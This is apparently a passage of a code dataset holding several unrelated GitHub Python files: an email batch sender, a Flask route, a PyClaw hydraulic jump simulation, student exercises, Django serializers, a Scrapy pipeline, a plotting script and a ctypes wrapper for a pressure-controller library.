tested on whippet\n if system == 'whippet':\n msg['From'] = prod_from_addr\n with smtplib.SMTP('localhost', port=25) as server: \n server.send_message(msg)\n \n elif mode == 'prod':\n msg['From'] = prod_from_addr\n msg['To'] = email['to_addrs']\n msg['BCC'] = email['bcc_addrs']\n\n with smtplib.SMTP('localhost', port=25) as server: \n server.send_message(msg)\n \n email['email_sent_timestamp'] = dt.datetime.now()\n email['email_sent_from_addr'] = msg['From']\n email['email_sent_to_addr'] = msg['To']\n email['bcc_addrs'] = msg['BCC']\n\n logger.info('====== 4/7 Generating batch report as dataframe =======')\n cols = ['npdes_permit_id', \n 'fiscal_quarter', \n 'to_addrs', \n 'bcc_addrs',\n 'whippet_sender_mode',\n 'email_sent_timestamp',\n 'email_sent_from_addr',\n 'email_sent_to_addr',\n 'email_template',\n 'subject',\n 'header',\n 'body'\n ]\n batch_report = pd.DataFrame(email_dicts)[cols]\n\n logger.info('======= 5/7 Saving batch report to s3 bucket ========')\n ## to_csv works on sherlock but not on whippet. Missing dependency within pandas\n ## work around: saving csv to the repo folder first, then copy that to S3 bucket, then remove the csv from the repo folder.\n #batch_report.to_csv(os.path.join(s3_project_dir, s3_run_dir,'batch_report.csv'), index = False)\n batch_report.to_csv('batch_report.csv', index = False)\n\n logger.info('======= 6/7 Subset and save KY batch report to s3 bucket ======')\n ky_batch_report = batch_report[batch_report.npdes_permit_id.str.startswith('KY')]\n #ky_batch_report.to_csv(os.path.join(s3_project_dir, s3_run_dir, 'batch_report_ky.csv'))\n ky_batch_report.to_csv('batch_report_ky.csv', index=False)\n\n os.system(f'aws s3 cp batch_report.csv {s3_project_dir}/{s3_run_dir}/batch_report.csv')\n os.system(f'aws s3 cp batch_report_ky.csv {s3_project_dir}/{s3_run_dir}/batch_report_ky.csv')\n os.system('rm batch_report*.csv')\n\n logger.info('========= 7/7 Saving logging file to s3 bucket =========')\n logger.info(f'Script FINISHED. Log file saved in S3 bucket {s3_log_dir}. Note: not yet synced with Sherlock oak folder.')\n logger_obj = bucket.Object(os.path.join(s3_log_dir, 'whippet_sender.log'))\n logger_obj.put(Body=log_capture_string.getvalue())\n\n print(\"===== Finish running whippet sender =====\")\n else:\n print('Script discontinued by user. Exiting.')\n\nif __name__ == \"__main__\":\n main()\n \n","repo_name":"nicole-hjlin/esnc_risk_notif","sub_path":"1_whippet_sender.py","file_name":"1_whippet_sender.py","file_ext":"py","file_size_in_byte":10505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36649947394","text":"from flask import jsonify, request\nfrom routes.router import app,resource,response,req,reqpar\n\nfrom app.services.SplanesCategory import SplanesCategory\nfrom app.models.Mproduct import ModelProduct\n\nimport json\nimport time\nimport collections\n\nclass RplanesCategory(resource):\n \"\"\"docstring for RplanesCategory.\"\"\"\n\n def __init__(self):\n pass\n\n def get(self):\n objectoJson = {'Mensaje':None,'Resultados':[]}\n\n try:\n requestReturn = SplanesCategory().GET_ALL_PUBLIC_CATEGORY()\n listJson = json.dumps(requestReturn)\n\n jsonTemplate = response(listJson,status=200, mimetype='application/json')\n jsonTemplate.headers['Access-Control-Allow-Origin'] = '*'\n print(\"____________________________________\")\n print(jsonTemplate)\n print(\"____________________________________\")\n print(\"Process select OK\")\n return jsonTemplate\n except Exception as exp:\n print(exp)\n return {'Mensaje':'Problema interno'},500\n","repo_name":"jose55mase/servise_kiero_broco","sub_path":"routes/add_route/RplanesCategory.py","file_name":"RplanesCategory.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73389164092","text":"\"\"\"\nCode to simulate 2D circular hydraulic jump in PyClaw.\n\nThis version uses a mapped (annular) grid.\n\nIn order to get a jump, you must either introduce a bathymetric barrier (circular ring),\ninclude bottom friction, or impose a subcritical flow at the outer boundary.\nBathymetry is not enabled for the mapped grid solver at present.\n\"\"\"\n\nfrom matplotlib import animation\nimport matplotlib.pyplot as plt\nfrom clawpack import pyclaw\nimport numpy as np\nfrom mapc2p import mapc2p, mapc2p_annulus\n\n# If plotting in a Jupyter notebook, do this:\n#from clawpack.visclaw.JSAnimation import IPython_display\n\n# Mapped grid parameters\nr_lower = 0.1\nr_upper = 1.0\ntheta_lower = 0.0\ntheta_upper = 2*np.pi\n\ndef compute_geometry(grid):\n r\"\"\"Computes\n a_x\n a_y\n length_ratio_left\n b_x\n b_y\n length_ratio_bottom\n cell_area\n \"\"\"\n\n dx, dy = grid.delta\n area_min = 1.e6\n area_max = 0.0\n\n x_corners, y_corners = grid.p_nodes\n\n lower_left_y, lower_left_x = y_corners[:-1,:-1], x_corners[:-1,:-1]\n upper_left_y, upper_left_x = y_corners[:-1,1: ], x_corners[:-1,1: ]\n lower_right_y, lower_right_x = y_corners[1:,:-1], x_corners[1:,:-1]\n upper_right_y, upper_right_x = y_corners[1:,1: ], x_corners[1:,1: ]\n\n a_x = upper_left_y - lower_left_y #upper left and lower left\n a_y = -(upper_left_x - lower_left_x)\n anorm = np.sqrt(a_x**2 + a_y**2)\n a_x, a_y = a_x/anorm, a_y/anorm\n length_ratio_left = anorm/dy\n\n b_x = -(lower_right_y - lower_left_y) #lower right and lower left\n b_y = lower_right_x - lower_left_x\n bnorm = np.sqrt(b_x**2 + b_y**2)\n b_x, b_y = b_x/bnorm, b_y/bnorm\n length_ratio_bottom = bnorm/dx\n\n area = 0*grid.c_centers[0]\n area += 0.5 * (lower_left_y+upper_left_y)*(upper_left_x-lower_left_x)\n area += 0.5 * (upper_left_y+upper_right_y)*(upper_right_x-upper_left_x)\n area += 0.5 * (upper_right_y+lower_right_y)*(lower_right_x-upper_right_x)\n area += 0.5 * (lower_right_y+lower_left_y)*(lower_left_x-lower_right_x)\n area = area/(dx*dy)\n area_min = min(area_min, np.min(area))\n area_max = max(area_max, np.max(area))\n\n return a_x, a_y, length_ratio_left, b_x, b_y, length_ratio_bottom, area\n\n\ndef plot_surface(claw, make_anim=True, save_plots=False, frames=101, val='surface',\n vmin=0., vmax=0.5, clim=None, bathymetry=False, plotdir='./_plots'):\n \"\"\"\n Plot results of 2D shallow water simulation as a pcolor plot and animate\n (intended for Jupyter notebook).\n\n If variable bathymetry is used, set bathymetry=True.\n \"\"\"\n print('plotting')\n fig = plt.figure(figsize=[10,10])\n ax1 = fig.add_subplot(111)\n try:\n # Use solution in memory\n frame = claw.frames[0]\n except:\n # Read solution from disk\n frame = pyclaw.Solution(0,path=claw,read_aux=bathymetry)\n if bathymetry:\n b = frame.aux[0,:,:]\n else:\n b = 0.\n h = frame.q[0,:,:]\n if val == 'surface':\n qq = np.maximum(b,h+b)\n elif val=='u':\n hu = frame.q[1,:,:]\n qq = hu #/h\n \n\n x, y = frame.state.grid.p_centers \n\n im = ax1.imshow(qq.T, #cmap='Blues',\n extent=[x.min(), x.max(), y.min(), y.max()],\n vmin=vmin, vmax=vmax,\n interpolation='nearest', origin='lower')\n \n plt.colorbar(im)\n def fplot(frame_number):\n try:\n frame = claw.frames[frame_number]\n except:\n frame = pyclaw.Solution(frame_number,path=claw,read_aux=bathymetry)\n h = frame.q[0,:,:]\n if val == 'surface':\n qq = np.maximum(b,h+b)\n elif val=='u':\n hu = frame.q[1,:,:]\n qq = hu #/h\n im.set_data(qq.T)\n if clim:\n im.set_clim(*clim)\n if save_plots:\n fname = plotdir+'/frame'+str(frame_number).zfill(4)+'.eps'\n fig.savefig(fname) \n return im,\n\n if make_anim:\n return animation.FuncAnimation(fig, fplot, frames=frames, interval=40, repeat=True)\n elif save_plots:\n import os\n if not os.path.exists(plotdir):\n os.makedirs(plotdir)\n for i in range(frames):\n fplot(i)\n\n\ndef jet(state, dim, _, qbc, __, num_ghost):\n \"Jet inflow BC at inner boundary.\"\n h0 = state.problem_data['h0']\n u0 = state.problem_data['u0']\n\n xc, yc = state.grid.p_centers_with_ghost(num_ghost)\n rc = np.sqrt(xc**2 + yc**2)\n \n if dim.name == 'r':\n qbc[0,:num_ghost,:] = h0\n qbc[1,:num_ghost,:] = h0*u0*xc[:num_ghost,:]/r_lower\n qbc[2,:num_ghost,:] = h0*u0*yc[:num_ghost,:]/r_lower\n\ndef subsonic_boundary_upper(state, dim, _, qbc, __, num_ghost):\n \"Subsonic outflow BC at fixed Froude number.\"\n xc, yc = state.grid.p_centers_with_ghost(num_ghost)\n rc = np.sqrt(xc**2 + yc**2)\n #rc, thetac = state.grid.c_centers_with_ghost(num_ghost)\n r0 = r_lower\n h0 = state.problem_data['h0']\n u0 = state.problem_data['u0']\n beta = r0*h0*u0\n F = state.problem_data['F_bdy'] # Froude number at boundary\n g = state.problem_data['grav']\n \n h = (beta/(rc*F*np.sqrt(g)))**(2./3)\n unorm = beta / (rc*h)\n \n if dim.name == 'r':\n qbc[0,-num_ghost:,:] = h[-num_ghost:,:]\n qbc[1,-num_ghost:,:] = h[-num_ghost:,:]*unorm[-num_ghost:,:]*xc[-num_ghost:,:]/(rc[-num_ghost:,:]+1.e-7)\n qbc[2,-num_ghost:,:] = h[-num_ghost:,:]*unorm[-num_ghost:,:]*yc[-num_ghost:,:]/(rc[-num_ghost:,:]+1.e-7)\n else:\n raise Exception(dim)\n \ndef step_friction(solver, state, dt):\n \"Friction source term: -cf u / h. This version is for Classic.\"\n cf = state.problem_data['cf']\n q = state.q\n h = q[0,:,:]\n u = q[1,:,:]/h\n v = q[2,:,:]/h\n\n q[1,:,:] = q[1,:,:] - dt*cf*u/h\n q[2,:,:] = q[2,:,:] - dt*cf*v/h\n \ndef setup(h0=0.5, u0=0.75, h_inf=0.15, g=1., num_cells_r=100,\n num_cells_theta=100, tfinal=10,\n solver_type='classic', num_output_times=100,\n boundary='subcritical', outdir='./_output', friction=False,\n friction_coeff=0.01, F_bdy=0.1, use_petsc=True, \n kalpha=1./3, kbeta=1./3, kepsilon=1.e-3):\n \n import shallow_quad_hllemcc_2D\n if use_petsc:\n from clawpack import petclaw as pyclaw\n else:\n from clawpack import pyclaw\n import shallow_quad_hllemcc_2D\n\n if solver_type == 'classic':\n solver = pyclaw.ClawSolver2D(shallow_quad_hllemcc_2D)\n solver.cfl_max = 0.5\n solver.cfl_desired = 0.45\n solver.num_eqn = 3\n solver.num_waves = 3\n solver.fwave = False\n solver.dimensional_split=False\n solver.transverse_waves = 1 #2\n elif solver_type == 'sharpclaw':\n solver = pyclaw.SharpClawSolver2D(shallow_quad_hllemcc_2D)\n\n solver.num_eqn = 3\n solver.num_waves = 3\n solver.fwave = False\n\n # Periodic BCs in theta direction\n solver.bc_lower[1] = pyclaw.BC.periodic\n solver.bc_upper[1] = pyclaw.BC.periodic\n solver.aux_bc_lower[1] = pyclaw.BC.periodic\n solver.aux_bc_upper[1] = pyclaw.BC.periodic\n\n solver.aux_bc_lower[0] = pyclaw.BC.extrap\n solver.aux_bc_upper[0] = pyclaw.BC.extrap\n\n # Jet at inner boundary\n solver.bc_lower[0] = pyclaw.BC.custom\n solver.user_bc_lower = jet\n\n if boundary == 'outflow':\n if friction == False:\n raise Exception('Either friction or subcritical outflow is required to produce a jump.')\n solver.bc_upper[0] = pyclaw.BC.extrap\n elif boundary == 'subcritical': # subcritical boundary condition\n solver.bc_upper[0] = pyclaw.BC.custom\n solver.user_bc_upper = subsonic_boundary_upper\n elif boundary == 'wall':\n solver.bc_upper[0] = pyclaw.BC.wall\n\n if friction:\n solver.step_source = step_friction\n solver.source_split = 1\n\n r = pyclaw.Dimension(r_lower,r_upper,num_cells_r,name='r')\n theta = pyclaw.Dimension(theta_lower,theta_upper,num_cells_theta,name='theta')\n domain = pyclaw.Domain([r,theta])\n domain.grid.mapc2p = mapc2p_annulus\n\n state = pyclaw.State(domain,3,7)\n \n rc, thetac = state.p_centers\n \n state.problem_data['r0'] = r_lower\n state.problem_data['h0'] = h0\n state.problem_data['u0'] = u0\n state.problem_data['grav'] = g # Gravitational force\n state.problem_data['kalpha'] = kalpha # Kemm's alpha\n state.problem_data['kbeta'] = kbeta # Kemm's beta\n state.problem_data['kepsilon'] = kepsilon # Kemm's epsilon\n state.problem_data['F_bdy'] = F_bdy\n state.problem_data['cf'] = friction_coeff\n\n a_x, a_y, length_left, b_x, b_y, length_bottom, area = compute_geometry(state.grid)\n\n state.aux[0,:,:] = a_x\n state.aux[1,:,:] = a_y\n state.aux[2,:,:] = length_left\n state.aux[3,:,:] = b_x\n state.aux[4,:,:] = b_y\n state.aux[5,:,:] = length_bottom\n state.aux[6,:,:] = area\n state.index_capa = 6 # aux[6,:,:] holds the capacity function\n\n \n state.q[0,:,:] = 0.15 + 0.1*np.random.rand(*state.q[0,:,:].shape)\n state.q[1,:,:] = 0.\n state.q[2,:,:] = 0.\n\n #===========================================================================\n # Set up controller and controller parameters\n #===========================================================================\n claw = pyclaw.Controller()\n claw.tfinal = tfinal\n claw.solution = pyclaw.Solution(state,domain)\n claw.solver = solver\n claw.num_output_times = num_output_times\n claw.outdir = outdir\n if num_cells_r < 400:\n claw.keep_copy = True\n #claw.output_format = None\n else:\n claw.keep_copy = False\n claw.setplot = setplot\n\n return claw\n\ndef setplot(plotdata):\n \"\"\" \n Plot solution using VisClaw.\n \"\"\"\n from mapc2p import mapc2p\n import numpy as np\n from clawpack.visclaw import colormaps\n\n plotdata.clearfigures() # clear any old figures,axes,items data\n plotdata.mapc2p = mapc2p\n \n # Figure for contour plot\n plotfigure = plotdata.new_plotfigure(name='contour', figno=0)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = 'auto'\n plotaxes.ylimits = 'auto'\n plotaxes.title = 'q[0]'\n plotaxes.scaled = True\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='2d_contour')\n plotitem.plot_var = 0\n plotitem.contour_levels = np.linspace(0., 1., 10)\n plotitem.contour_colors = 'k'\n plotitem.patchedges_show = 1\n plotitem.MappedGrid = True\n\n # Figure for pcolor plot\n plotfigure = plotdata.new_plotfigure(name='q[0]', figno=1)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = 'auto'\n plotaxes.ylimits = 'auto'\n plotaxes.title = 'q[0]'\n plotaxes.scaled = True\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = 0\n plotitem.pcolor_cmap = colormaps.red_yellow_blue\n plotitem.pcolor_cmin = 0.\n plotitem.pcolor_cmax = 1.\n plotitem.add_colorbar = True\n plotitem.MappedGrid = True\n\n # Figure for pcolor y-momentum plot\n plotfigure = plotdata.new_plotfigure(name='rho*v', figno=2)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = 'auto'\n plotaxes.ylimits = 'auto'\n plotaxes.title = 'q[2]'\n plotaxes.scaled = True\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = 2\n plotitem.pcolor_cmap = colormaps.red_yellow_blue\n plotitem.pcolor_cmin = -1.\n plotitem.pcolor_cmax = 1.\n plotitem.add_colorbar = True\n plotitem.MappedGrid = True\n\n\n return plotdata\n\nif __name__ == \"__main__\":\n from clawpack.pyclaw.util import run_app_from_main\n claw = run_app_from_main(setup,setplot)\n","repo_name":"ketch/circular_hydraulic_jump","sub_path":"hydraulic_jump_2D_annulus.py","file_name":"hydraulic_jump_2D_annulus.py","file_ext":"py","file_size_in_byte":11837,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"2918530932","text":"\"\"\"\nExercicio 6.2 - Complete a função fatorial abaixo, que recebe como parâmetro um número inteiro k,\nk >= 0, e retorna k!.\n\nEscreva apenas o corpo da função. Observe que o código já inclui chamadas para a função fatorial,\npara que você possa testar a função.\n\ndef fatorial(k):\n '''(int) -> int\n\n Recebe um inteiro k e retorna o valor de k!\n\n Pre-condicao: supoe que k eh um numero inteiro nao negativo.\n '''\n\n k_fat = 1\n\n # COMPLETE ESSA FUNÇÃO\n\n return k_fat\n\n# testes\nprint(\"0! =\", fatorial(0))\nprint(\"1! =\", fatorial(1))\nprint(\"5! =\", fatorial(5))\nprint(\"17! =\", fatorial(17))\n\"\"\"\ndef fatorial(k):\n '''(int) -> int\n\n Recebe um inteiro k e retorna o valor de k!\n\n Pre-condicao: supoe que k eh um numero inteiro nao negativo.\n '''\n\n k_fat = 1\n count = 1\n while count < k:\n count += 1\n k_fat *= count\n\n total_fatorial = k_fat\n return total_fatorial\n\n\n# testes\nprint(\"0! =\", fatorial(0))\nprint(\"1! =\", fatorial(1))\nprint(\"5! =\", fatorial(5))\nprint(\"17! =\", fatorial(17))","repo_name":"Lapetina/Python_coursera","sub_path":"semana5/lista_exercicios_4/leitura_funcoes/fatorial_exercicio_6_2.py","file_name":"fatorial_exercicio_6_2.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27433929325","text":"def draw_Line(tick_length,tick_label=''):\n \"\"\"\n Draw one line with given tick length (followed by optional label).\n \"\"\"\n line = '-' * tick_length\n if tick_label:\n line += ' ' + tick_label\n print (line)\n \ndef draw_Interval(central_length):\n \"\"\"\n Draw tick interval based upon a central tick length\n \"\"\"\n if central_length > 0: # stop when length drops to 0\n draw_Interval(central_length-1) # recursively draw top ticks\n draw_Line(central_length) # draw center tick\n draw_Interval(central_length-1) # recursively draw bottom ticks\n \ndef draw_Euler(num_inches,major_length):\n \"\"\"\n Draw English ruler with given number of inches, major tick length\n \"\"\"\n draw_Line(major_length,'O') # draw inch 0 line\n for j in range(1,1+num_inches):\n draw_Interval(major_length-1) # draw interior ticks for inch\n draw_Line(major_length,str(j)) # draw inch j line and label\n \n \n#Code Fragment 4.2: A recursive implementation of a function that draws a ruler","repo_name":"zhuhanqing/Data-Structures-Algorithms-Goodrich","sub_path":"Chapter04_Recursion/draw_English_Ruler.py","file_name":"draw_English_Ruler.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74195662012","text":"#\n# classifiedad/api/serializers.py\n#\n\nfrom rest_framework import serializers\n\nfrom classifiedad.models import ClassifiedAd, ClassifiedAdImage\n\n\nclass ClassifiedAdImageSerializer(serializers.ModelSerializer):\n class Meta:\n model = ClassifiedAdImage\n fields = ('url',)\n\n\nclass ClassifiedAdSerializer(serializers.ModelSerializer): \n images = ClassifiedAdImageSerializer(many=True, read_only=True) \n \n class Meta:\n model = ClassifiedAd \n \n fields = ('id', 'fabrication_year', 'model_year', 'sales_phrase',\n 'mileage', 'is_new', 'color', 'price', 'images', \n 'doc_ok', 'accept_exchange', 'accept_new_offer',)\n \n def to_representation(self, instance):\n representation = super().to_representation(instance)\n\n representation['brand'] = instance.model.brand.brand\n representation['model'] = instance.model.model\n\n try:\n representation['model_version'] = instance.model_version.version \n except AttributeError:\n representation['model_version'] = \"\" \n\n return representation","repo_name":"daniel-armbrust/oci-motando-proj","sub_path":"webapp/motando/classifiedad/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"12394195883","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html\n\nfrom scrapy.pipelines.images import ImagesPipeline\nimport json,pymysql\n\nclass ProPipeline(object):\n def process_item(self, item, spider):\n return item\n# 自定义的保存图片的管道,添加了往item中添加图片名字段的功能\nclass BaiheImagesPipeline(ImagesPipeline):\n def item_completed(self, results, item, info):\n pic_pathurl = []\n for res in results:\n if res[0]:#下载成功\n pic_pathurl.append(res[1]['path'].strip('full/'))\n print(res[1]['path'])\n pic_pathurl = ','.join(pic_pathurl)\n item['pic_pathurl'] = pic_pathurl\n return item\n\n# 保存入数据库的管道\nclass BaiheMysqlPipeline(object):\n def open_spider(self,spider):\n self.con = pymysql.connect('127.0.0.1','root','123456','reptile',charset='utf8')\n self.cursor = self.con.cursor()\n def process_item(self,item,spider):\n sql,data = item.get_sql()\n try:\n self.cursor.execute(sql,data)\n self.con.commit()\n except Exception as e:\n self.con.rollback()\n print('============================报错===========================')\n print(e)\n print('=============================='+item[\"one_url\"]+'=============================')\n\n return item\n def close_spider(self,spider):\n self.cursor.close()\n self.con.close()\n","repo_name":"theme716/small-routine","sub_path":"insect/scrapy_2/pro/pro/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20339530452","text":"import matplotlib.pyplot as plt\nfilename = \"./out.txt\"\n\nepoch = []\nacc = []\nrmse = []\n\nwith open(filename, \"r\") as f:\n for eachline in f.readlines():\n line = eachline.split(' ')\n \n epoch.append(int(line[0]) - 1);\n acc.append(line[1]);\n rmse.append(line[2]);\n\nplt.figure(1)\nplt.subplot(121)\nplt.plot(epoch, acc)\nplt.xlabel('No. of iterations')\nplt.ylabel('Accuracy')\nplt.title('Accuracy')\nplt.grid(True)\n#legend(loc = 0)\n#close()\n\n#plt.figure(figsize = (8,6), dpi = 80, num = 1, facecolor = \"white\")\nplt.subplot(122)\nplt.plot(epoch, rmse)\nplt.xlabel('No. of iterations')\nplt.ylabel('RMSE')\nplt.title('RMSE')\nplt.grid(True)\n#legend(loc = 0)\n#close()\n\nplt.show()\n","repo_name":"zhqwerty/DMF-MPI","sub_path":"Output/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42308803553","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"\nWrapper for the shared library. Functions that return more than one value will\nreturn a tuple containing all of the outputs in order, starting from the\nerror code.\n\"\"\"\n\n#\"\"\"\nimport sys\nimport platform\nimport os\nimport pkg_resources\nimport ctypes\nfrom ctypes import byref, c_uint8, c_uint16, c_uint64, c_float, POINTER, c_bool, c_char_p, c_char\n\nis_64_bits = sys.maxsize > 2 ** 32\n\nif sys.platform.startswith(\"win32\"):\n libclass = ctypes.CDLL\n lib_relative_path = ('shared', 'windows')\n if is_64_bits:\n lib_name = \"pgmfc_64.dll\"\n else:\n lib_name = \"pgmfc_32.dll\"\nelif sys.platform.startswith(\"linux\"):\n sharedObjectVersion = \"2.0.0\"\n libclass = ctypes.CDLL\n lib_name = \"pgmfc_x86_64.so\"\n if platform.machine().lower().startswith('arm'):\n lib_relative_path = ('shared', 'pi')\n else:\n lib_relative_path = ('shared', 'linux')\nelse:\n raise NotImplementedError(\"SDK not available on \" + sys.platform)\n#\"\"\"\n\n# import Lib.mfc_controls as lib\nresource_package = __name__\nresource_path = '/'.join(lib_relative_path)\n# resource_path = r\"F:\\bitbucket\\FlowSDK\\pgmfc\\x64\\Release\"\nlibpath = pkg_resources.resource_filename(resource_package, resource_path)\n# print libpath, lib_name\nlib = libclass(os.path.join(libpath, lib_name))\n\n# print lib\n\nlib.mfcs_detect.argtypes = [POINTER(c_uint16)]\nlib.mfcs_initialization.argtypes = [c_uint16]\nlib.mfcs_close.argtypes = [c_uint64]\nlib.mfcs_get_serial.argtypes = [c_uint64, POINTER(c_uint16)]\nlib.mfcs_frimwareversion.argtypes = [c_uint64, c_char_p]\n\nlib.mfcs_monitor_start.argtypes = [c_uint64, c_uint16]\nlib.mfcs_monitor_stop.argtypes = [c_uint64]\n\nlib.mfcs_stopEmergency.argtypes = [c_uint64]\n\nlib.mfcs_set_params.argtypes = [c_uint64, c_uint16, c_uint16, c_float, c_float, c_float, c_float, c_float, c_bool]\nlib.mfcs_set_params_flowrate.argtypes = [c_uint64, c_uint16, c_uint16, c_float, c_float, c_float, c_float, c_float, c_bool]\n\nlib.mfcs_purge_on.argtypes = [c_uint64, c_uint16]\nlib.mfcs_purge_off.argtypes = [c_uint64, c_uint16]\n\nlib.mfcs_getCurPressure.argtypes = [c_uint64, c_uint16, POINTER(c_float), POINTER(c_uint16)]\nlib.mfcs_getCurFlowrate.argtypes = [c_uint64, c_uint16, POINTER(c_float), POINTER(c_uint16)]\nlib.mfcs_getCurFlowrate_Liquid.argtypes = [c_uint64, c_uint16, POINTER(c_float), POINTER(c_uint16)]\nlib.mfcs_getCurFlowtotalizer.argtypes = [c_uint64, c_uint16, POINTER(c_float), POINTER(c_uint16)]\n\nlib.mfcs_operateDigitalOutputs.argtypes = [c_uint64, c_uint16, c_uint16, c_uint16, c_uint16, c_uint16]\nlib.mfcs_queryDigitalIOStates.argtypes = [c_uint64, POINTER(c_uint16)]\n\nlib.mfcs_checkFlowmeter.argtypes = [c_uint64, c_uint16]\nlib.mfcs_queryFlowmeterInfo.argtypes = [c_uint64, c_uint16, POINTER(c_bool), c_char_p]\n\nlib.mfcs_queryRotaryAddress.argtypes = [c_uint64, c_uint16, c_uint16]\nlib.mfcs_rotaryReset.argtypes = [c_uint64, c_uint16, c_uint16]\nlib.mfcs_queryRotaryCurPos.argtypes = [c_uint64, c_uint16, c_uint16]\nlib.mfcs_rotarySwitchTo.argtypes = [c_uint64, c_uint16, c_uint16, c_uint16]\n\ndef mfcs_detect():\n serial_number_list = (ctypes.c_uint16 * 10)(*([0] * 10))\n c_error = c_uint8(lib.mfcs_detect(serial_number_list))\n serial_number_list = list(filter(None, serial_number_list))\n return (c_error.value, serial_number_list)\n\ndef mfcs_get_handler(serial_number):\n return c_uint64(lib.mfcs_get_handler(c_uint16(serial_number)))\n\ndef mfcs_initialization(serial_number):\n value = lib.mfcs_initialization(serial_number)\n return c_uint64(value)\n\ndef mfcs_close(handle):\n c_error = c_uint8(lib.mfcs_close(handle))\n return c_error.value\n\ndef mfcs_get_serial(handle):\n serial = c_uint16(0)\n c_error = c_uint8(lib.mfcs_get_serial(handle, byref(serial)))\n return (c_error.value, serial.value)\n\ndef mfcs_firmwareversion(handle):\n version = c_char_p('')\n c_error = c_uint8(lib.mfcs_frimwareversion(handle, version))\n return (c_error.value, version.value)\n\ndef mfcs_monitor_start(handle, span=100):\n c_error = c_uint8(lib.mfcs_monitor_start(handle, c_uint16(span)))\n return c_error.value\n\ndef mfcs_monitor_stop(handle):\n c_error = c_uint8(lib.mfcs_monitor_stop(handle))\n return c_error.value\n\ndef mfcs_stopEmergency(handle):\n c_error = c_uint8(lib.mfcs_stopEmergency(handle))\n return c_error.value\n\ndef mfcs_purge_on(handle, channel):\n c_error = c_uint8(lib.mfcs_purge_on(handle, c_uint16(channel)))\n return c_error.value\n\ndef mfcs_purge_off(handle, channel):\n c_error = c_uint8(lib.mfcs_purge_off(handle, c_uint16(channel)))\n return c_error.value\n\ndef mfcs_set_params(handle, channel, type=1, peak=2.0, trough=2.0, period=10, duty=0.25,\n runtime=50, bNormalOpen=False):\n c_error = c_uint8(lib.mfcs_set_params(handle, c_uint16(channel),\n c_uint16(type), c_float(peak),\n c_float(trough), c_float(period), c_float(duty),\n c_float(runtime), c_bool(bNormalOpen)))\n return c_error.value\n\ndef mfcs_set_params_flowrate(handle, channel, type=1, peak=100, trough=50, period=10, duty=0.25,\n runtime=50, bNormalOpen=False):\n c_error = c_uint8(lib.mfcs_set_params_flowrate(handle, c_uint16(channel),\n c_uint16(type), c_float(peak),\n c_float(trough), c_float(period), c_float(duty),\n c_float(runtime), c_bool(bNormalOpen)))\n return c_error.value\n\n\ndef mfcs_operateDigitalOutputs(handle, idPort, itype, polarity, peroid, pulse):\n c_error = c_uint8(lib.mfcs_operateDigitalOutputs(handle, c_uint16(idPort), c_uint16(itype),\n c_uint16(polarity),\n c_uint16(peroid), c_uint16(pulse)))\n return c_error.value\n\ndef mfcs_queryDigitalIOStates(handle):\n states_list = (ctypes.c_uint16 * 8)(*([0] * 8))\n c_error = c_uint8(lib.mfcs_queryDigitalIOStates(handle, states_list))\n states_list = list(states_list)\n # states_list = list(filter(None, states_list))\n return (c_error.value, states_list)\n\ndef mfcs_checkFlowmeterInfo(handle, channel):\n c_error = c_uint8(lib.mfcs_checkFlowmeterInfo(handle, c_uint16(channel)))\n return c_error.value\n\ndef mfcs_queryFlowmeterInfo(handle, channel):\n connected = c_bool(False)\n model = c_char_p('')\n c_error = c_uint8(lib.mfcs_queryFlowmeterInfo(handle, c_uint16(channel), byref(connected), model))\n return (c_error.value, connected.value, model.value)\n\n# region rotary valves\ndef mfcs_queryRotaryAddress(handle, switchType, mountID):\n c_error = c_uint8(lib.mfcs_queryRotaryAddress(handle, switchType, mountID))\n return c_error.value\n\ndef mfcs_rotaryReset(handle, switchType, mountID):\n c_error = c_uint8(lib.mfcs_rotaryReset(handle, switchType, mountID))\n return c_error.value\n\ndef mfcs_queryRotaryCurPos(handle, switchType, mountID):\n c_error = c_uint8(lib.mfcs_queryRotaryCurPos(handle, switchType, mountID))\n return c_error.value\n\ndef mfcs_rotarySwitchTo(handle, switchType, mountID, portID):\n c_error = c_uint8(lib.mfcs_rotarySwitchTo(handle, switchType, mountID, portID))\n return c_error.value\n# endregion\n\n# region read current sensor data. timestamp, value\ndef mfcs_cur_pressure(handle, channel):\n pressure = c_float(0)\n timestamp = c_uint16(0)\n c_error = c_uint8(lib.mfcs_getCurPressure(handle, c_uint16(channel), byref(pressure), byref(timestamp)))\n return (c_error.value, pressure.value, timestamp.value)\n\ndef mfcs_cur_airflowrate(handle, channel):\n flowrate = c_float(0)\n timestamp = c_uint16(0)\n c_error = c_uint8(lib.mfcs_getCurFlowrate(handle, 